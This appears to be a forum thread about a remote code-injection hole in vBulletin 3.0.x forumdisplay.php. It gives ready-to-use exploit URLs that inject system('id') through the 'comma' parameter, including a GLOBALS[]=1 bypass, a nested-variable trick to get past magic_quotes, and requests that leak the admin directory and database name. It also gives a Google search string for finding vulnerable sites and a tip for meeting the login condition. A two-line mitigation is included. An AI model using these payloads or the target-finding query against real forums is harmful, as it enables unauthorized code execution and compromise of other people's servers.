AL3NDALEED Founded that within the following conditions:
Quote: |
* 1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options.
* 2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest
* 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum.
* 4th condition : magic_quotes_gpc must be OFF SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ))
|
Is it possible to inject code as in the following example:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
Anyway the forth condition can be bypassed like this (nesting formulas - Credit to pokley aka pokleyzz - Not Tested)
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma={$func($comm)}&func=system&comm=id
Or evaluating the value of variables:
forumdisplay.php?GLOBALS[]=1&f=2&comma=$admincpdir
forumdisplay.php?GLOBALS[]=1&f=2&comma=$dbname
So if you are a web master:
Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers'])
$comma = ''; |

As you can see is just a GET req the one by AL3NDALEEB.
The problem lays in Magic Quotes. These protect the innocent against this exploit. |

Is very hard find servers they have these functions
in my opinion only 15 % all VB (3.0.x-3.04) installed in all world is vulnerable
Code: | * 1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options.
* 2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest
* 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum. |

searching something like this `inurl:"forumdisplay" +"Currently Active Users" +"vBulletin Version 3.0.3"` in google will help find one.
You can create the third condition by login as registered user and view the forum. |
